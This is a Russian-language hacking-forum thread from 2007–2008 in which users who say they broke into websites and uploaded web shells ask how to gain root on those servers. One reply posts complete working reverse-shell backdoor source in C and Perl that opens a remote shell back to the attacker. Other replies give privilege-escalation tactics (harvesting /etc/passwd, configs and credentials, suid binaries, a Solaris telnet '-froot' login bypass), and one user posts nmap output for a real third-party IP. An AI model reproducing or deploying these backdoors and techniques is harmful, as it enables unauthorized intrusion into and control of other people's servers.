Форум АНТИЧАТ - Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)

Страница 1 из 3

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)

- - Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!) (https://forum.antichat.xyz/showthread.php?t=33224)

Obormot

12.02.2007 03:02

Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)

Added by L0rd_Ha0S: Вопросы по поднятию прав, по использованию разного рода скриптов, вроде web-шеллов, биндшеллов, бэкконект, и т.п. - задавать сюда! НЕ РАЗРЕШАЕТСЯ - вопросы о сплойтах, для этого есть специальные темы!

В общем думаю не один сталкивался с такой ситуацией.. Взломали мы какую-нибудь CMS (не важно что)
И залили наш шел... НО прав на редиктирование ГРУБО говоря index.php нет(
Мой вопролс водится к тому, какие методы существую для поднятия прав на удаленом сервере. На самом деле тупой дефейс мне не нужен, просто хочу понять смысл..
Дак вот, мной был залит бек дур на серв (.pl) нет катом получул входящее соединение. В общем как мне поступать дальше ) Сервер управляется 5.4-RELEASE FreeBSD.

andy13

12.02.2007 09:45

Посмотри статью Constantine
http://forum.antichat.ru/thread30813.html
Еще в разделе Статьи должно быть что-то по этой тематике.

hsi	12.02.2007 22:44

Obormot
Во-первых нужно узнать, стоит ли на apache noexec. Если стоит, то ты никакой бинарник из под nobody запустить не сможешь. Если не стоит и система не патченная, то можно попробовать сплойт для этой ветки.
Почитай mysql-конфиги, возможно пасс оттуда подойдет на фтп.
Прочитай /etc/passwd, отсей аккаунты, имеющие шелл и попробуй их видом login=pass на фтп.
Ищи уязвимые демоны в системе (старые mysql, ftp, etc), уязвимости в которых позволяют повысить локальные привелегии.
В общем, способов существует масса, нужно только проявить фантазию.

Bac9l

09.03.2007 05:18

Здравствуйте.
У меня вопрос примерно такой же. Залил р57 на серв, бэк коннект чет не контачит (вероятно кривые руки, неткатом слушаю порт, задаю в р57 ип, тыркаю кнопку и он виснет) может ли этому серв припятствовать? Есть ли другиt способы поднять права, или стащить /etc/shadow? Уж очень серв понравился)

zl0ba

09.03.2007 08:16

Пробуй биндить как перловыми скриптами так и сишным.

hsi	09.03.2007 14:18

Если твой комп в локальной сети, то есть ты выходишь через шлюз, то backconnect не получится. Вполне возможно, что на сервере правильно настроенный фаерволл, который блокирует любой неразрешенный явно траффик.
Попробуй запустить backconnect вручную с помощью этих скриптов.
Backconnect на С:

Код:

/*

oooo...oooo.oooooooo8.ooooooooooo

.8888o..88.888........88..888..88

.88.888o88..888oooooo.....888....

.88...8888.........888....888....

o88o....88.o88oooo888....o888o...

*********************************

**** Network security team ******

********* nst.void.ru ***********

*********************************

* Title: nsT BackConnect Backdoor v1.0

* Date: 09.04.2006

* Usage:

*        client:        nc -lp 9999

*        server: ./backconnect <ip_client> 9999

*********************************

*/



#include <stdlib.h>

#include <stdio.h>

#include <error.h>

#include <string.h>

#include <fcntl.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <resolv.h>



int main (int argc, char **argv) {

    struct sockaddr_in sock;

    int sd;

    char command[256];

    

    if (argc < 3) {

        printf("%s <host> <port>\n", argv[0]);

        return 1;

    }

    

    close(1);

    

    if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {

        perror(argv[0]);

        return 1;

    }

    

    bzero(&sock, sizeof(sock));

    

    sock.sin_family = AF_INET;

    sock.sin_port = htons(atoi(argv[2]));

    inet_aton(argv[1], &sock.sin_addr);

    

    if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {

        perror(argv[0]);

        return 1;

    }

    

    close(2);

    dup(sd);

    

    bzero(command, 256);

    while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {

        system(command);

        bzero(command, 256);

    }

    

    close(sd);

    return 0;

}

Backconnect на Perl:

Код:

#!/usr/bin/perl

use IO::Socket;

#IRAN HACKERS SABOTAGE Connect Back Shell

#code by:LorD

#We Are :LorD-C0d3r-NT

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#[*] Resolving HostName

#[*] Connecting... 127.0.0.1

#[*] Spawning Shell

#[*] Connected to remote host



#bash-2.05b# nc -vv -l -p 2121

#listening on [any] 2121 ...

#connect to [127.0.0.1] from localhost [127.0.0.1] 2121

#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#--==Systeminfo==--

#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux

#

#--==Userinfo==--

#uid=1001(lord) gid=100(users) groups=100(users)

#

#--==Directory==--

#/root

#

#--==Shell==--

#

$system = '/bin/sh';

$ARGC=@ARGV;

print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";

if ($ARGC!=2) {

print "Usage: $0 [Host] [Port] \n\n";

die "Ex: $0 127.0.0.1 2121 \n";

}

use Socket;

use FileHandle;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";

print "[*] Resolving HostName\n";

print "[*] Connecting... $ARGV[0] \n";

print "[*] Spawning Shell \n";

print "[*] Connected to remote host \n";

SOCKET->autoflush();

open(STDIN, ">&SOCKET");

open(STDOUT,">&SOCKET");

open(STDERR,">&SOCKET");

print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";

system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");

system($system);

#EOF

Если есть какие-то вопросы - не стесняйся задавать.

gcc	09.03.2007 15:47

Что то, сколько ни пробовал, su -m nobody не дает прав nobody. Значит система пропатчена, или это работает только при настоящем ssh ?

1ten0.0net1

09.03.2007 16:07

При наличии терминала/псевдотерминала работает. По поводу поднятия прав - самый лучший вариант, конечно - чтение всяческих хисторей, пассвордов, конфигов. Кроме того, стоит поискать suid-бит на файлах, доступных на запись всем - такое тоже бывает. Ну и конечно суидные бинарники.

Bac9l

09.03.2007 17:51

hsi
Именно через шлюз, чет я раньше не подумал(. Пробовал на серве порт открыть, р57 опять виснет и нифига... Буду читать всяческие хистори, пассворы, конфиги)
Оп просканировал только что порты, там бо2к на 54320-м висит и прокси элитный, часов 5 назад еще ниче не было)))
Есть ли бо2к под линух?

ShadOS

09.03.2007 22:10

Цитата:

Сообщение от Bac9l

Бред... С чего ты взял что там именно bo2k? Это тебе nmap сказал? С какими параметрами ты сканировал? Порт TCP или UDP? Сканер ошибся, просто 54320 - дефолтный порт Back Orifice 2000. Уж сколько лет, а он покоя народу не даёт. Кстати, если даже сканер не ошибся (точнее он всё равно ошибся), то это, вероятно, какой-нибдуь простенький honeypot для отлова всяких мег0 хекк3р0в.
И ещё:

Цитата:

BO2K is the most powerful network administration tool available for the Microsoft environment, bar none.

А прокси теперь значит админы не могут для своих целей поднять?
И что значит по-твоему элитный? То что он не светит remote addr и useragent? Как ты это определил? Различные чекеры тоже ошибаются =)

Bac9l

10.03.2007 00:59

Может конечно и бред... Но помойму у тебя инфпрмации слишком мало, чтоб делать такие заключения. Наблюдаю за сервом уже дней 5, раньше портов было открыто в 2 раза меньше.
Там дыр немерено... Помойму прост ктото вместе со мной там обитает...
Вот зацените-
21/tcp open ftp
22/tcp open ssh
25/tcp filtered smtp
42/tcp filtered nameserver
80/tcp open http
81/tcp filtered hosts2-ns
111/tcp filtered rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
139/tcp filtered netbios-ssn
389/tcp filtered ldap
445/tcp filtered microsoft-ds
513/tcp open login
514/tcp open shell
636/tcp filtered ldapssl
1001/tcp filtered unknown
1022/tcp filtered unknown
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1080/tcp open socks
1433/tcp filtered ms-sql-s
2049/tcp filtered nfs
2766/tcp filtered listen
3128/tcp filtered squid-http
3268/tcp filtered globalcatLDAP
3269/tcp filtered globalcatLDAPssl
4045/tcp open lockd
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6667/tcp open irc
8080/tcp open elit
32776/tcp open sometimes-rpc15
32778/tcp open sometimes-rpc19
32779/tcp open sometimes-rpc21
32780/tcp open sometimes-rpc23
54320/tcp open bo2k
Еще портов 5 открыто было...
Почему ты думашь, что сканер ошибся?

hsi	10.03.2007 01:04

Bac9l
Судя по портам - там windows. А что пишет веб-шелл рст? Если какой-то unix - то вполне возможно, что это honeypot.

ShadOS

10.03.2007 01:08

2Bac9l
попробуй утилиту amap от THC, оредели баннеры сервисов, также отсканируй nmap c опциями -sV -O -vvv и отпишись здесь. Если это FreeBSD-сервер с таким количеством открытых портов, форумной репутацией бьюсь об заклад, что это подсава в виде honeypot.

Цитата:

Почему ты думашь, что сканер ошибся?

LOL =). MS Sql не будет крутиться под FreeBSD, как и bo2k (читай предыдущий мой пост). и т.д.

Цитата:

Сообщение от hsi

Bac9l
Судя по портам - там windows. А что пишет веб-шелл рст? Если какой-то unix - то вполне возможно, что это honeypot.

Может он обшибся? =)

Цитата:

Сообщение от Bac9l

Сервер управляется 5.4-RELEASE FreeBSD.

2Bac9l как ты это определил?

Bac9l

10.03.2007 02:24

Про 5.4-RELEASE FreeBSD эт не я говорил... Серв на SunOS 5.10 Generic точно.
Вот че нмап сказал-

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2007-03-10 01:12 MSK
Initiating SYN Stealth Scan against aux-209-217-33-203.oklahoma.net (209.217.33.203) [1663 ports] at 01:12
Discovered open port 22/tcp on 209.217.33.203
Discovered open port 80/tcp on 209.217.33.203
Discovered open port 21/tcp on 209.217.33.203
Discovered open port 32780/tcp on 209.217.33.203
Discovered open port 514/tcp on 209.217.33.203
Increasing send delay for 209.217.33.203 from 0 to 5 due to 39 out of 128 dropped probes since last increase.
Discovered open port 32779/tcp on 209.217.33.203
SYN Stealth Scan Timing: About 29.13% done; ETC: 01:13 (0:01:13 remaining)
Discovered open port 4045/tcp on 209.217.33.203
Discovered open port 32778/tcp on 209.217.33.203
Discovered open port 32776/tcp on 209.217.33.203
The SYN Stealth Scan took 75.38s to scan 1663 total ports.
Initiating service scan against 9 services on aux-209-217-33-203.oklahoma.net (209.217.33.203) at 01:13
The service scan took 5.84s to scan 9 services on 1 host.
Initiating RPCGrind Scan against aux-209-217-33-203.oklahoma.net (209.217.33.203) at 01:13
The RPCGrind Scan took 287.47s to scan 5 ports on aux-209-217-33-203.oklahoma.net (209.217.33.203).
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Host aux-209-217-33-203.oklahoma.net (209.217.33.203) appears to be up ... good.
Interesting ports on aux-209-217-33-203.oklahoma.net (209.217.33.203):
(The 1631 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.0a
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
25/tcp filtered smtp
42/tcp filtered nameserver
80/tcp open http Apache httpd
81/tcp filtered hosts2-ns
111/tcp filtered rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
139/tcp filtered netbios-ssn
389/tcp filtered ldap
445/tcp filtered microsoft-ds
514/tcp open shell?
636/tcp filtered ldapssl
1001/tcp filtered unknown
1022/tcp filtered unknown
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1433/tcp filtered ms-sql-s
2049/tcp filtered nfs
2766/tcp filtered listen
3128/tcp filtered squid-http
3268/tcp filtered globalcatLDAP
3269/tcp filtered globalcatLDAPssl
4045/tcp open nlockmgr 1-4 (rpc #100021)
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
32776/tcp open metad 1-2 (rpc #100229)
32778/tcp open rpc.unknown
32779/tcp open rpc.metamedd 1 (rpc #100242)
32780/tcp open rpc
Device type: general purpose
Running: Sun Solaris 9
OS details: Sun Solaris 9
OS Fingerprint:
TSeq(Class=RI%gcd=2%SI=23F27%IPID=I%TS=100HZ)
T1(Resp=Y%DF=Y%W=C0B7%ACK=S++%Flags=AS%Ops=NNTMNW)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=N)
PU(Resp=Y%DF=Y%TOS=0%IPLEN=70%RIPTL=148%RID=E%RIPC K=E%UCK=F%ULEN=134%DAT=E)

Uptime 31.955 days (since Tue Feb 6 02:22:45 2007)
TCP Sequence Prediction: Class=random positive increments
Difficulty=147239 (Good luck!)
TCP ISN Seq. Numbers: 9E182FF0 9E26F16A 9E2D6746 9E34CDAE 9E46CB3A 9E4FAE7C
IPID Sequence Generation: Incremental

Nmap finished: 1 IP address (1 host up) scanned in 373.539 seconds
Raw packets sent: 2182 (87.6KB) | Rcvd: 1665 (66.9KB)
IRC и соксы исчезли) ну и еще че-то

hsi	10.03.2007 03:15

Bac9l
Ты сказал, у тебя веб-шелл. Покажи вывод команды uname -a

Bac9l

10.03.2007 03:27

SunOS jupiter 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-Enterprise.
Днем там еще телнет открыт был.

Не подскажешь, где webmin пароли хранит?

hsi	10.03.2007 04:08

Читай конфиг - /etc/webmin/miniserv.conf
Там указано, какие пароли он использует - из файла /etc/webmin/miniserv.users или /usr/local/etc/webmin/miniserv.users, либо системную авторизацию unix /etc/shadow.

Bac9l

10.03.2007 04:30

К /etc/webmin/ доступ закрыт, к /var/webmin/ тоже, есть ток /opt/webmin/ а там как я понял только скрипты.

hsi	10.03.2007 05:01

Без рута ты их не прочитаешь.

ShadOS

10.03.2007 13:36

Цитата:

Сообщение от Bac9l

SunOS jupiter 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-Enterprise.
Днем там еще телнет открыт был.

Вот и ответ! На солярке недавно багу нашли, позволяющую заходить по telnet любому юзеру не исползуя пароль вот таки макаром:
telnet -l "-froot" <ip>
Видимо, пока он был открыт - кто-то влез в неё, админ, обнаружив это, снёс демон in.telnetd и удалил весь срач, который оставил нерадивый хаксор. Хотя это мог и быть червь, который специально создан под данную уязвимость:

Цитата:

Новый червь распространяется через дыру в Solaris
01 марта 2007 года, 11:14
Текст: Владимир Парамонов

Специалисты компании Arbor Networks сообщили об обнаружении вредоносной программы, распространяющейся через дыру в операционной системе Sun Solaris.

Брешь, о которой идет речь, была выявлена в первой половине прошлого месяца. Задействовать дыру злоумышленник может через модуль Login, который позволяет дистанционно входить в операционную систему. В том случае, если разрешен протокол удаленного управления Telnet, нападающий при определенных условиях может получить доступ к атакуемому ПК без пароля. Уязвимость присутствует в операционных системах Solaris версий 10 и 11.

Как отмечают эксперты Arbor Networks, на днях в интернете были обнаружены несколько узлов, осуществляющих сканирование серверов Telnet. При обнаружении уязвимых систем на них загружается вредоносное программное обеспечение, которое затем выполняет ряд операций, нацеленных на саморазмножение. О том, выполняет ли червь какие-либо деструктивные действия, пока ничего не сообщается.

Защититься от возможных атак червя можно путем отключения протокола Telnet. Кроме того, компания Sun Microsystems выпустила специальную утилиту, которая позволяет очистить компьютеры с Solaris 10 и 11 от появившейся на днях вредоносной программы.

А насчёт вот этого:

Цитата:

Про 5.4-RELEASE FreeBSD эт не я говорил... Серв на SunOS 5.10 Generic точно.

Сорри, недоглядел. Кстати, как видишь, nmap ошибся. Такое часто случается, не стоит полагаться только на сканер - думай головой.

win4	10.12.2007 12:40

Станный сервер

Есть один очень странный сервак. Залил на него phpremview и путишествую по папкам. Но! Если исправить какой-либо файл, потом обновить страницу, изменения не происходят. Аналогично нашел файлик с примерно таким содежанием echo "123" запускаю, выдается эха, но тока совсем другая. Что это за фишка такая и как с ней бороться?

Alexsize

10.12.2007 12:43

У тебя скоре всего нету прав. Вообще phpremview довольно кривой скрипт. Юзай шелл от Электа. В новостях про него уже рассказывали. Он корректно работает с файлами.

win4	10.12.2007 14:08

Цитата:

Сообщение от Alexsize

нет, такая же фигня и r57 сохраняешь одно, а реально работает что-то совсем другое

blackybr

10.12.2007 14:57

покажи id
+
права на файл который хочешь изменить

win4	10.12.2007 15:02

FreeBSD 4.11-RELEASE #0
uid=65534 ( nobody ) gid=8080 ( apache )
-rw-rw----
system отключена
да, кстати, потом открываешь файл, там изменения сохранены, но даже если die() сделать вначале все равно работает какой то другой скрипт :-О

blackybr

10.12.2007 15:26

ты еще выведи пользователя и группу владельцев файла.
но сразу скажу он у тебя должен быть или владельцем или членом группы nobody..

если не так то он даже открывать его не будет

win4	10.12.2007 15:37

Цитата:

Сообщение от blackybr

user1052 apache
Но совсем не понятно, почему открывать этот файл может, сохранять, но в браузере отображается не тот совсем

blackybr

10.12.2007 16:19

ну правильно. группа одна и та же.. а браузер ф5 пробовал? и кэш чистить :d

win4	10.12.2007 16:33

Цитата:

Сообщение от blackybr

ну правильно. группа одна и та же.. а браузер ф5 пробовал? и кэш чистить :d

да блин, глупость это. Я файл новый создаю, а брозер его не видит. 404 возвращаеся
хоте физически он есть его править мона и тд...
может актуально, но не сообщал.
на одном аккуанте несколько сайтов хожу через соседний, по всем суб ходит, в основном никак. основной в папке htdocs

blackybr

10.12.2007 18:58

уверен что не бэкап, что сайт не левый и тд и тп, найди запись о нем в httpd.conf

win4	13.12.2007 18:04

Цитата:

Сообщение от blackybr

уверен что не бэкап, что сайт не левый и тд и тп, найди запись о нем в httpd.conf

нашел. Это его рабочая директория
/pub/home/сайтег/htdocs
не понятно

Scipio

13.12.2007 19:58

хм... попробуй пропингуй этот сайт со своего компа (узнай ип сервака на котором расположен сайт) и сравни с ип сервака, на котором у тебя залит шелл и на котором ты делаешь изменения

win4	14.12.2007 12:02

Цитата:

Сообщение от Scipio

хм... попробуй пропингуй этот сайт со своего компа (узнай ип сервака на котором расположен сайт) и сравни с ип сервака, на котором у тебя залит шелл и на котором ты делаешь изминения

Да, ты был прав... протупил я

totem

25.01.2008 14:35

как поднять привелении группы?

Заметил на некоторых серверах по команде id получаю инфу о нахождении в нескольких группах, например:
$ id
uid=48(apache) gid=48(apache) groups=48(apache),505(administrator),506(webusers) ,508(trac)

при исполнении скриптов - они запускаются под группой 48(apache) , а как мне поднять права до группы webusers ?

заранее спасибо за ответ.

blackybr

25.01.2008 14:38

у тебя и так есть права группы webusers

Grema

23.03.2008 05:55

залил скриптик ,на сайт, perl-овский. chmod 755. так когда к ниму обращаюсь мне его как обычный текст показывает, понимаю что лажа в конфигах апача! что можно сделать?

Ky3bMu4

23.03.2008 17:39

1)Владелец скрипта www-юзер(или от кого там сервак работавет)
2)На директорию, где скрипт лежит в httpd.conf опция ExecCGI должна быть.

Grema

23.03.2008 17:42

ну ExecCGI можно в .htaccess прописать же, да?

а вот что с 1-м делать? я же nobody!

Gorev

21.05.2008 20:22

2.6.8-2-686-smp
and
2.4.29-grsec+w+fhs6b+gr0501+nfs+a32+++p4+sata+c4+gr2b-v6.189

как до рута добратся ?

zer0ska

01.06.2008 06:37

посоветуйте быстрый брут для su (под ssh) с возможностью испльзовать словари и просто перебирать.

Время: 11:39

Страница 1 из 3

Показывать 40 сообщений этой темы на одной странице